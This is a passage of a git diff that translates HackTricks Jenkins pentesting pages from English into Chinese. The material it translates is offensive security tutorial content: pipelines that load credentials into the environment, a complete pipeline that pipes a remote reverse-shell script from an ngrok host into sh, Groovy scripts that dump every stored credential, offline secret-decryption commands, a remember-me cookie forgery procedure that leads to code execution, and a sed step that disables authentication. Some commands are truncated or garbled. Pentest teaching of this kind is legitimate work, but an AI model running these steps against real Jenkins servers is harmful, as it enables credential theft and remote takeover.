info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles: +### 检查环境变量 +可以为整个管道或特定阶段声明 **明文环境变量**。这些环境变量 **不应包含敏感信息**,但攻击者始终可以 **检查所有管道** 配置/Jenkinsfiles: ```bash pipeline { - agent {label 'built-in'} - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." +} +steps { ``` - ### Dumping secrets -For information about how are secrets usually treated by Jenkins check out the basic information: +有关Jenkins通常如何处理秘密的信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -Credentials can be **scoped to global providers** (`/credentials/`) or to **specific projects** (`/job//configure`). Therefore, in order to exfiltrate all of them you need to **compromise at least all the projects** that contains secrets and execute custom/poisoned pipelines. - -There is another problem, in order to get a **secret inside the env** of a pipeline you need to **know the name and type of the secret**. For example, you try lo **load** a **`usernamePassword`** **secret** as a **`string`** **secret** you will get this **error**: +凭据可以**作用于全局提供者**(`/credentials/`)或**特定项目**(`/job//configure`)。因此,为了提取所有凭据,您需要**至少妥协所有包含秘密的项目**并执行自定义/被污染的管道。 +还有另一个问题,为了在管道的**环境中获取一个秘密**,您需要**知道秘密的名称和类型**。例如,如果您尝试将一个**`usernamePassword`** **秘密**作为**`string`** **秘密**加载,您将收到此**错误**: ``` ERROR: Credentials 'flag2' is of type 'Username with password' where 'org.jenkinsci.plugins.plaincredentials.StringCredentials' was expected ``` - -Here you have the way to load some common secret types: - +这里是加载一些常见秘密类型的方法: ```bash withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) { - sh ''' - env #Search for USERNAME and PASS - ''' +sh ''' +env #Search for USERNAME and PASS +''' } withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) { - sh ''' - env #Search for SECRET - ''' +sh ''' +env #Search for SECRET +''' } withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) { - sh ''' - env # Search for USERPASS - ''' +sh ''' +env # Search for USERPASS +''' } # You can also load multiple env variables at once withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { - sh ''' - env - ''' +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +env +''' } ``` - -At the end of this page you can **find all the credential types**: [https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) +在本页面的末尾,您可以**找到所有凭证类型**:[https://www.jenkins.io/doc/pipeline/steps/credentials-binding/](https://www.jenkins.io/doc/pipeline/steps/credentials-binding/) > [!WARNING] -> The best way to **dump all the secrets at once** is by **compromising** the **Jenkins** machine (running a reverse shell in the **built-in node** for example) and then **leaking** the **master keys** and the **encrypted secrets** and decrypting them offline.\ -> More on how to do this in the [Nodes & Agents section](./#nodes-and-agents) and in the [Post Exploitation section](./#post-exploitation). +> **一次性转储所有秘密**的最佳方法是**妥协****Jenkins**机器(例如在**内置节点**中运行反向 shell),然后**泄露****主密钥**和**加密秘密**并离线解密它们。\ +> 有关如何执行此操作的更多信息,请参见[节点和代理部分](./#nodes-and-agents)和[后期利用部分](./#post-exploitation)。 -### Triggers +### 触发器 -From [the docs](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers): The `triggers` directive defines the **automated ways in which the Pipeline should be re-triggered**. For Pipelines which are integrated with a source such as GitHub or BitBucket, `triggers` may not be necessary as webhooks-based integration will likely already be present. The triggers currently available are `cron`, `pollSCM` and `upstream`. - -Cron example: +来自[文档](https://www.jenkins.io/doc/book/pipeline/syntax/#triggers):`triggers`指令定义了**管道应重新触发的自动方式**。对于与 GitHub 或 BitBucket 等源集成的管道,`triggers`可能不是必需的,因为基于 webhook 的集成可能已经存在。当前可用的触发器有`cron`、`pollSCM`和`upstream`。 +Cron 示例: ```bash triggers { cron('H */4 * * 1-5') } ``` +检查 **文档中的其他示例**。 -Check **other examples in the docs**. +### 节点与代理 -### Nodes & Agents +一个 **Jenkins 实例** 可能在 **不同的机器上运行不同的代理**。从攻击者的角度来看,访问不同的机器意味着 **不同的潜在云凭证** 可以被窃取或 **不同的网络访问** 可能被滥用以利用其他机器。 -A **Jenkins instance** might have **different agents running in different machines**. From an attacker perspective, access to different machines means **different potential cloud credentials** to steal or **different network access** that could be abuse to exploit other machines. - -For more information check the basic information: +有关更多信息,请查看基本信息: {{#ref}} basic-jenkins-information.md {{#endref}} -You can enumerate the **configured nodes** in `/computer/`, you will usually find the \*\*`Built-In Node` \*\* (which is the node running Jenkins) and potentially more: +您可以在 `/computer/` 中枚举 **配置的节点**,通常会找到 **`内置节点`**(即运行 Jenkins 的节点)以及可能更多的节点: ![](<../../images/image (249).png>) -It is **specially interesting to compromise the Built-In node** because it contains sensitive Jenkins information. - -To indicate you want to **run** the **pipeline** in the **built-in Jenkins node** you can specify inside the pipeline the following config: +**攻陷内置节点** 特别有趣,因为它包含敏感的 Jenkins 信息。 +要指示您想在 **内置 Jenkins 节点** 中 **运行** **管道**,您可以在管道中指定以下配置: ```bash pipeline { - agent {label 'built-in'} +agent {label 'built-in'} ``` +### 完整示例 -### Complete example - -Pipeline in an specific agent, with a cron trigger, with pipeline and stage env variables, loading 2 variables in a step and sending a reverse shell: - +在特定代理中的管道,带有 cron 触发器,具有管道和阶段环境变量,在一个步骤中加载 2 个变量并发送反向 shell: ```bash pipeline { - agent {label 'built-in'} - triggers { cron('H */4 * * 1-5') } - environment { - GENERIC_ENV_VAR = "Test pipeline ENV variables." - } +agent {label 'built-in'} +triggers { cron('H */4 * * 1-5') } +environment { +GENERIC_ENV_VAR = "Test pipeline ENV variables." +} - stages { - stage("Build") { - environment { - STAGE_ENV_VAR = "Test stage ENV variables." - } - steps { - withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), - string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS - ''' - } - } - } +stages { +stage("Build") { +environment { +STAGE_ENV_VAR = "Test stage ENV variables." +} +steps { +withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'), +string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh PASS +''' +} +} +} - post { - always { - cleanWs() - } - } +post { +always { +cleanWs() +} +} } ``` - -## Arbitrary File Read to RCE +## 任意文件读取到 RCE {{#ref}} jenkins-arbitrary-file-read-to-rce-via-remember-me.md @@ -326,19 +306,17 @@ jenkins-rce-creating-modifying-project.md jenkins-rce-creating-modifying-pipeline.md {{#endref}} -## Post Exploitation +## 后期利用 ### Metasploit - ``` msf> post/multi/gather/jenkins_gather ``` - ### Jenkins Secrets -You can list the secrets accessing `/credentials/` if you have enough permissions. Note that this will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. +您可以通过访问 `/credentials/` 列出秘密,如果您拥有足够的权限。请注意,这只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能还有 **更多凭据**。 -If you can **see the configuration of each project**, you can also see in there the **names of the credentials (secrets)** being use to access the repository and **other credentials of the project**. +如果您可以 **查看每个项目的配置**,您也可以在其中看到用于访问存储库的 **凭据名称(秘密)** 和 **项目的其他凭据**。 ![](<../../images/image (180).png>) @@ -350,19 +328,18 @@ jenkins-dumping-secrets-from-groovy.md #### From disk -These files are needed to **decrypt Jenkins secrets**: +这些文件用于 **解密 Jenkins 秘密**: - secrets/master.key - secrets/hudson.util.Secret -Such **secrets can usually be found in**: +这样的 **秘密通常可以在**: - credentials.xml - jobs/.../build.xml - jobs/.../config.xml -Here's a regex to find them: - +这是一个用于查找它们的正则表达式: ```bash # Find the secrets grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" @@ -372,11 +349,9 @@ grep -lre "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" # Secret example credentials.xml: {AQAAABAAAAAwsSbQDNcKIRQMjEMYYJeSIxi2d3MHmsfW3d1Y52KMOmZ9tLYyOzTSvNoTXdvHpx/kkEbRZS9OYoqzGsIFXtg7cw==} ``` +#### 离线解密Jenkins秘密 -#### Decrypt Jenkins secrets offline - -If you have dumped the **needed passwords to decrypt the secrets**, use [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **to decrypt those secrets**. - +如果您已经转储了 **解密秘密所需的密码**,请使用 [**这个脚本**](https://github.com/gquere/pwn_jenkins/blob/master/offline_decryption/jenkins_offline_decrypt.py) **来解密这些秘密**。 ```bash python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml 06165DF2-C047-4402-8CAB-1C8EC526C115 @@ -384,23 +359,20 @@ python3 jenkins_offline_decrypt.py master.key hudson.util.Secret cred.xml b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEAt985Hbb8KfIImS6dZlVG6swiotCiIlg/P7aME9PvZNUgg2Iyf2FT ``` - -#### Decrypt Jenkins secrets from Groovy - +#### 从 Groovy 解密 Jenkins 秘密 ```bash println(hudson.util.Secret.decrypt("{...}")) ``` +### 创建新管理员用户 -### Create new admin user +1. 访问 Jenkins config.xml 文件在 `/var/lib/jenkins/config.xml` 或 `C:\Program Files (x86)\Jenkins\` +2. 搜索词 `true` 并将 **`true`** 改为 **`false`**。 +1. `sed -i -e 's/truefalsetrue` 再次 **启用** **安全性**,并 **再次重启 Jenkins**。 -1. Access the Jenkins config.xml file in `/var/lib/jenkins/config.xml` or `C:\Program Files (x86)\Jenkis\` -2. Search for the word `true`and change the word \*\*`true` \*\* to **`false`**. - 1. `sed -i -e 's/truefalsetrue` and **restart the Jenkins again**. - -## References +## 参考文献 - [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) - [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) @@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}")) - [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md index 6e62a8536..87e50d856 100644 --- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md +++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md @@ -6,48 +6,48 @@ ### Username + Password -The most common way to login in Jenkins if with a username or a password +在Jenkins中登录的最常见方式是使用用户名或密码。 ### Cookie -If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen). +如果**授权的cookie被盗取**,它可以用于访问用户的会话。该cookie通常被称为`JSESSIONID.*`。(用户可以终止所有会话,但他需要首先发现cookie被盗取)。 ### SSO/Plugins -Jenkins can be configured using plugins to be **accessible via third party SSO**. +Jenkins可以通过插件配置为**通过第三方SSO访问**。 ### Tokens -**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API. +**用户可以生成令牌**以允许应用程序通过CLI或REST API冒充他们。 ### SSH Keys -This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/)) +该组件为Jenkins提供了内置的SSH服务器。这是[Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/)的替代接口,可以使用任何SSH客户端以这种方式调用命令。(来自[docs](https://plugins.jenkins.io/sshd/)) ## Authorization -In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options: +在`/configureSecurity`中,可以**配置Jenkins的授权方法**。有几种选项: -- **Anyone can do anything**: Even anonymous access can administrate the server -- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access. -- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**. -- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**. +- **任何人都可以做任何事**:甚至匿名访问也可以管理服务器。 +- **遗留模式**:与Jenkins <1.164相同。如果您拥有**“admin”角色**,您将获得**对系统的完全控制**,否则(包括**匿名**用户)您将只有**读取**权限。 +- **登录用户可以做任何事**:在此模式下,每个**登录用户获得Jenkins的完全控制**。唯一没有完全控制的用户是**匿名用户**,他们只有**读取权限**。 +- **基于矩阵的安全性**:您可以在表中配置**谁可以做什么**。每个**列**代表一个**权限**。每个**行**代表一个**用户或组/角色**。这包括一个特殊用户'**anonymous**',代表**未认证用户**,以及'**authenticated**',代表**所有已认证用户**。 ![](<../../images/image (149).png>) -- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.** -- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`. +- **基于项目的矩阵授权策略**:此模式是对“**基于矩阵的安全性**”的**扩展**,允许为每个项目单独**定义额外的ACL矩阵**。 +- **基于角色的策略**:允许使用**基于角色的策略**定义授权。在`/role-strategy`中管理角色。 ## **Security Realm** -In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms: +在`/configureSecurity`中,可以**配置安全领域**。默认情况下,Jenkins支持几种不同的安全领域: -- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/). -- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default. -- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups. -- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization. +- **委托给servlet容器**:用于**委托认证给运行Jenkins控制器的servlet容器**,例如[Jetty](https://www.eclipse.org/jetty/)。 +- **Jenkins自己的用户数据库**:使用**Jenkins自己的内置用户数据存储**进行认证,而不是委托给外部系统。默认启用。 +- **LDAP**:将所有认证委托给配置的LDAP服务器,包括用户和组。 +- **Unix用户/组数据库**:**将认证委托给Jenkins控制器上的底层Unix**操作系统级用户数据库。此模式还允许重用Unix组进行授权。 -Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as: +插件可以提供额外的安全领域,这可能对将Jenkins纳入现有身份系统有用,例如: - [Active Directory](https://plugins.jenkins.io/active-directory) - [GitHub Authentication](https://plugins.jenkins.io/github-oauth) @@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora ## Jenkins Nodes, Agents & Executors -Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/): +来自[docs](https://www.jenkins.io/doc/book/managing/nodes/)的定义: -**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold. +**节点**是**构建代理运行的机器**。Jenkins监控每个附加节点的磁盘空间、可用临时空间、可用交换空间、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置的阈值,则节点将被下线。 -**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine. +**代理**代表Jenkins控制器**管理任务执行**,通过**使用执行器**。代理可以使用任何支持Java的操作系统。构建和测试所需的工具安装在代理运行的节点上;它们可以**直接安装或在容器中安装**(Docker或Kubernetes)。每个**代理实际上是主机上的一个进程,具有自己的PID**。 -An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time. +**执行器**是**任务执行的插槽**;实际上,它是**代理中的一个线程**。节点上的**执行器数量**定义了可以在该节点上同时执行的**并发任务**的数量。换句话说,这决定了可以在该节点上同时执行的**并发Pipeline `stages`**的数量。 ## Jenkins Secrets ### Encryption of Secrets and Credentials -Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include: +来自[docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)的定义:Jenkins使用**AES加密和保护秘密**、凭据及其各自的加密密钥。这些加密密钥存储在`$JENKINS_HOME/secrets/`中,以及用于保护这些密钥的主密钥。该目录应配置为仅允许Jenkins控制器运行的操作系统用户具有对该目录的读写访问(即,`chmod`值为`0700`或使用适当的文件属性)。**主密钥**(有时在密码术语中称为“密钥加密密钥”)是**以\_未加密\_形式存储在Jenkins控制器文件系统中的**`$JENKINS_HOME/secrets/master.key`**,这并不能保护直接访问该文件的攻击者。大多数用户和开发人员将通过[Secret](https://javadoc.jenkins.io/byShortName/Secret) API间接使用这些加密密钥,以加密通用秘密数据或通过凭据API。对于对密码学感兴趣的人,Jenkins在密码块链接(CBC)模式下使用AES,使用PKCS#5填充和随机IV加密存储在`$JENKINS_HOME/secrets/`中的[CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey)实例,文件名对应于其`CryptoConfidentialKey` id。常见的密钥id包括: -- `hudson.util.Secret`: used for generic secrets; -- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types; -- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and +- `hudson.util.Secret`:用于通用秘密; +- `com.cloudbees.plugins.credentials.SecretBytes.KEY`:用于某些凭据类型; +- `jenkins.model.Jenkins.crumbSalt`:由[CSRF保护机制](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)使用;以及 ### Credentials Access -Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project. +凭据可以**作用于全局提供者**(`/credentials/`),任何配置的项目都可以访问,或者可以作用于**特定项目**(`/job//configure`),因此仅可从特定项目访问。 -According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials. +根据[**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):在作用域内的凭据可以无限制地提供给管道。为了**防止在构建日志中意外暴露**,凭据在常规输出中被**屏蔽**,因此调用`env`(Linux)或`set`(Windows),或打印其环境或参数的程序将**不会在构建日志中向本来无法访问凭据的用户显示它们**。 -**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.** +**这就是为什么攻击者需要,例如,将凭据进行base64编码以提取凭据。** ## References @@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md index 9d2b232e1..445b50180 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md @@ -2,108 +2,104 @@ {{#include ../../banners/hacktricks-training.md}} -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) +在这篇博客文章中,可以找到将Jenkins中的本地文件包含漏洞转化为RCE的好方法:[https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: +这是一个AI生成的摘要,内容涉及如何利用任意cookie的构造来获取RCE,利用本地文件读取,直到我有时间自己创建摘要为止: -### Attack Prerequisites +### 攻击前提 -- **Feature Requirement:** "Remember me" must be enabled (default setting). -- **Access Levels:** Attacker needs Overall/Read permissions. -- **Secret Access:** Ability to read both binary and textual content from key files. +- **功能要求:** “记住我”必须启用(默认设置)。 +- **访问级别:** 攻击者需要整体/读取权限。 +- **秘密访问:** 能够读取关键文件中的二进制和文本内容。 -### Detailed Exploitation Process +### 详细利用过程 -#### Step 1: Data Collection +#### 第一步:数据收集 -**User Information Retrieval** +**用户信息检索** -- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - - **Username** - - **User seed** - - **Timestamp** - - **Password hash** +- 访问每个用户的用户配置和秘密,从`$JENKINS_HOME/users/*.xml`中收集: +- **用户名** +- **用户种子** +- **时间戳** +- **密码哈希** -**Secret Key Extraction** +**密钥提取** -- Extract cryptographic keys used for signing the cookie: - - **Secret Key:** `$JENKINS_HOME/secret.key` - - **Master Key:** `$JENKINS_HOME/secrets/master.key` - - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` +- 提取用于签名cookie的加密密钥: +- **秘密密钥:** `$JENKINS_HOME/secret.key` +- **主密钥:** `$JENKINS_HOME/secrets/master.key` +- **MAC密钥文件:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` -#### Step 2: Cookie Forging +#### 第二步:Cookie伪造 -**Token Preparation** +**令牌准备** -- **Calculate Token Expiry Time:** +- **计算令牌过期时间:** - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` +```javascript +tokenExpiryTime = currentServerTimeInMillis() + 3600000 // 将当前时间加一小时 +``` -- **Concatenate Data for Token:** +- **连接令牌数据:** - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` +```javascript +token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey +``` -**MAC Key Decryption** +**MAC密钥解密** -- **Decrypt MAC Key File:** +- **解密MAC密钥文件:** - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` +```javascript +key = toAes128Key(masterKey) // 将主密钥转换为AES128密钥格式 +decrypted = AES.decrypt(macFile, key) // 解密.mac文件 +if not decrypted.hasSuffix("::::MAGIC::::") +return ERROR; +macKey = decrypted.withoutSuffix("::::MAGIC::::") +``` -**Signature Computation** +**签名计算** -- **Compute HMAC SHA256:** +- **计算HMAC SHA256:** - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` +```javascript +mac = HmacSHA256(token, macKey) // 使用令牌和MAC密钥计算HMAC +tokenSignature = bytesToHexString(mac) // 将MAC转换为十六进制字符串 +``` -**Cookie Encoding** +**Cookie编码** -- **Generate Final Cookie:** +- **生成最终Cookie:** - ```javascript - cookie = base64.encode( - username + ":" + tokenExpiryTime + ":" + tokenSignature - ) // Base64 encode the cookie data - ``` +```javascript +cookie = base64.encode( +username + ":" + tokenExpiryTime + ":" + tokenSignature +) // Base64编码cookie数据 +``` -#### Step 3: Code Execution +#### 第三步:代码执行 -**Session Authentication** +**会话认证** -- **Fetch CSRF and Session Tokens:** - - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. +- **获取CSRF和会话令牌:** +- 向`/crumbIssuer/api/json`发送请求以获取`Jenkins-Crumb`。 +- 从响应中捕获`JSESSIONID`,该ID将与记住我cookie一起使用。 -**Command Execution Request** +**命令执行请求** -- **Send a POST Request with Groovy Script:** +- **发送带有Groovy脚本的POST请求:** - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` +```bash +curl -X POST "$JENKINS_URL/scriptText" \ +--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ +--header "Jenkins-Crumb: $CRUMB" \ +--header "Content-Type: application/x-www-form-urlencoded" \ +--data-urlencode "script=$SCRIPT" +``` - - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. +- Groovy脚本可用于在Jenkins环境中执行系统级命令或其他操作。 -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. +提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求,以安全地执行任意代码。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md index 8699b8159..2da4bb0b5 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md @@ -3,10 +3,9 @@ {{#include ../../banners/hacktricks-training.md}} > [!WARNING] -> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. - -You can **dump all the secrets from the Groovy Script console** in `/script` running this code +> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也包含 **更多凭据**。 +您可以通过运行此代码在 `/script` 中 **从 Groovy 脚本控制台转储所有秘密**。 ```java // From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/ import jenkins.model.* @@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '') return ``` - -#### or this one: - +#### 或者这个: ```java import java.nio.charset.StandardCharsets; def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( - com.cloudbees.plugins.credentials.Credentials.class +com.cloudbees.plugins.credentials.Credentials.class ) for (c in creds) { - println(c.id) - if (c.properties.description) { - println(" description: " + c.description) - } - if (c.properties.username) { - println(" username: " + c.username) - } - if (c.properties.password) { - println(" password: " + c.password) - } - if (c.properties.passphrase) { - println(" passphrase: " + c.passphrase) - } - if (c.properties.secret) { - println(" secret: " + c.secret) - } - if (c.properties.secretBytes) { - println(" secretBytes: ") - println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) - println("") - } - if (c.properties.privateKeySource) { - println(" privateKey: " + c.getPrivateKey()) - } - if (c.properties.apiToken) { - println(" apiToken: " + c.apiToken) - } - if (c.properties.token) { - println(" token: " + c.token) - } - println("") +println(c.id) +if (c.properties.description) { +println(" description: " + c.description) +} +if (c.properties.username) { +println(" username: " + c.username) +} +if (c.properties.password) { +println(" password: " + c.password) +} +if (c.properties.passphrase) { +println(" passphrase: " + c.passphrase) +} +if (c.properties.secret) { +println(" secret: " + c.secret) +} +if (c.properties.secretBytes) { +println(" secretBytes: ") +println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) +println("") +} +if (c.properties.privateKeySource) { +println(" privateKey: " + c.getPrivateKey()) +} +if (c.properties.apiToken) { +println(" apiToken: " + c.apiToken) +} +if (c.properties.token) { +println(" token: " + c.token) +} +println("") } ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md 